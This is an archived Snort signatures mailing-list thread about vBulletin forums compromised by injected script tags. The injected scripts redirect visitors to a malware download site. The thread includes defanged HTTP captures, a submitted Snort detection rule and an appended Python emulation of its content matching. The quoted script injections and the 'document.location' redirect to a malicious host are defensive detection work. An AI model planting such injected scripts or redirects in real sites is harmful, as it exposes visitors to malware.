
List:       snort-sigs
Subject:    Re: [Snort-sigs] Compromised vBulletin sig
From:       Matt Mickel <mmickel () sourcefire ! com>
Date:       2015-04-30 18:49:42
Message-ID: 55427946.1010609 () sourcefire ! com

Hi, James-

This rule has been reviewed and added to the community ruleset.  I 
removed the PCRE from the committed version and instead used the within 
content modifier.  This made the rule much more efficient while still 
detecting the relevant content.  Thanks so much for your submission.  
Cheers,

Matt Mickel

On 04/16/2015 01:30 PM, James Lay wrote:
> Didn't see this in any current ruleset, so I thought I'd post it here.
> Yesterday I saw two of these.  Injected into the vBulletin initial page:
> 
> <script type="text/javascript"
> src="meow://meh[.]com/misc.php?v=364&amp;js=js"></script>
> <script type="text/javascript"
> src="meow://bleh[.]com/forums/misc.php?v=420&amp;js=js"></script>
> 
> 
> #######################################################################################
> GET /misc.php?v=364&js=js HTTP/1.1
> Accept: application/javascript, */*;q=0.8
> Referer:
> meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
> Accept-Language: en-US
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
> Trident/5.0)
> Accept-Encoding: gzip, deflate
> Host: meh.com
> Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507;
> bblastactivity=0
> Cache-Control: max-stale=0
> Connection: Keep-Alive
> Pragma: no-cache
> 
> HTTP/1.1 200 OK
> Date: Wed, 15 Apr 2015 15:58:25 GMT
> Content-Type: text/html; charset=ISO-8859-1
> Transfer-Encoding: chunked
> Connection: keep-alive
> Expires: 0
> Cache-Control: private, post-check=0, pre-check=0, max-age=0
> Pragma: no-cache
> Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT;
> path=/
> Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
> X-Powered-By: PleskLin
> Server: cloudflare-nginx
> CF-RAY: 1d78da121f59012e-SJC
> Content-Encoding: gzip
> 
> document.location='meow://filestore72[.]info/download.php?id=f823cc00'
> #######################################################################################
>  
> This in turn goes to:
> 
> #######################################################################################
> GET /download.php?id=f823cc00 HTTP/1.1
> Accept: text/html, application/xhtml+xml, */*
> Referer:
> meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
> Accept-Language: en-US
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
> Trident/5.0)
> Accept-Encoding: gzip, deflate
> Host: filestore72[.]info
> Cache-Control: max-stale=0
> Connection: Keep-Alive
> Pragma: no-cache
> 
> HTTP/1.1 302 Moved Temporarily
> Server: nginx/1.0.12
> Date: Wed, 15 Apr 2015 15:53:40 GMT
> Content-Type: text/html
> Content-Length: 161
> Connection: close
> Location:
> meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==
>  
> <html>
> <head><title>302 Found</title></head>
> <body bgcolor="white">
> <center><h1>302 Found</h1></center>
> <hr><center>nginx/1.0.12</center>
> </body>
> </html>
> #######################################################################################
>  
> 
> Seems to be old-ish news, but the sig is below:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS
> (msg:"SERVER-WEBAPP Compromised vbulletin site";
> flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v=";
> uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui";
> reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info;
> classtype:bad-unknown; sid:10000156; rev:1;)
> 
> As usual, not sure if I have this perfect so anything to improve this
> sig would be excellent.  Thank you.
> 
> James
> 
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
> http://www.snort.org
> 
> 
> Please visit http://blog.snort.org for the latest news about Snort!


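Matt's reply says the committed rule dropped James's PCRE in favour of the `within` content modifier. The Python below is an added example, written for this page and not taken from the thread or from the Snort community ruleset. It emulates how Snort walks a chain of `content` matches (each search starts where the previous match ended, and `within:N` confines the next search to the following N bytes) and runs James's original PCRE, an assumed `within`-based chain, and the three bare `uricontent` checks side by side over the two URIs seen in the thread plus some constructed near-misses. The `within` chain is my reconstruction of what such a rule could look like, not the text Matt committed, which the page does not show.

```python
import re

# Request URIs: the two observed in the thread, plus constructed benign and
# near-miss URIs (NOT from the capture) to show what each check accepts.
SAMPLE_URIS = [
    b"/misc.php?v=364&js=js",         # observed in the thread
    b"/forums/misc.php?v=420&js=js",  # observed in the thread (second script src)
    b"/misc.php?do=buddylist",        # constructed: ordinary vBulletin misc.php use
    b"/misc.php?v=1234&js=js",        # constructed: four-digit version number
    b"/misc.php?v=364&x=1&js=js",     # constructed: extra parameter in between
]

# James's PCRE as posted: exactly three digits between "v=" and "&js=js".
ORIGINAL_PCRE = re.compile(rb"/misc\.php\?v=[0-9]{3}&js=js", re.I)

# Assumed reconstruction of a PCRE-free rule body in Snort 2 syntax
# (NOT the committed community rule; that text is not on the page):
#   content:"/misc.php?"; http_uri;
#   content:"v="; within:2; http_uri;
#   content:"&js=js"; within:10; http_uri;
# within:N means the next pattern must fit entirely inside the N bytes that
# follow the end of the previous match; 10 allows up to four version digits.
WITHIN_CHAIN = [
    (b"/misc.php?", None),
    (b"v=", 2),
    (b"&js=js", 10),
]

# The three bare uricontent checks from James's rule with no positional
# modifiers: each pattern may appear anywhere after the previous one.
BARE_CHAIN = [(b"/misc.php?", None), (b"v=", None), (b"js=js", None)]


def content_chain_matches(buf: bytes, chain) -> bool:
    """Emulate a Snort content chain with optional within modifiers.

    Snort evaluates contents left to right; each search begins at the end of
    the previous match.  A within:N limits that search to the next N bytes.
    Matching is case-sensitive, as content without nocase is.  This runs on the
    raw path; real uricontent/http_uri matching is done on the normalized URI.
    """
    cursor = 0
    for pattern, within in chain:
        window = buf[cursor:] if within is None else buf[cursor:cursor + within]
        idx = window.find(pattern)
        if idx < 0:
            return False
        cursor += idx + len(pattern)
    return True


def evaluate(uris):
    """Return {uri: (pcre_hit, within_chain_hit, bare_chain_hit)}."""
    return {
        u: (
            ORIGINAL_PCRE.search(u) is not None,
            content_chain_matches(u, WITHIN_CHAIN),
            content_chain_matches(u, BARE_CHAIN),
        )
        for u in uris
    }


if __name__ == "__main__":
    for uri, (pcre_hit, within_hit, bare_hit) in evaluate(SAMPLE_URIS).items():
        print(f"{uri.decode():32} pcre={pcre_hit!s:5} "
              f"within={within_hit!s:5} bare={bare_hit}")
```

Running it shows why the modifier matters: the three bare `uricontent` checks also fire on `/misc.php?v=364&x=1&js=js`, where `js=js` is nowhere near `v=`, while the `within` chain rejects it without a regex evaluation. The chain is slightly looser than the PCRE (it accepts `v=1234&js=js`, which `[0-9]{3}` does not), which is the usual trade for dropping a PCRE from a rule that fast-pattern content matching already gates.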

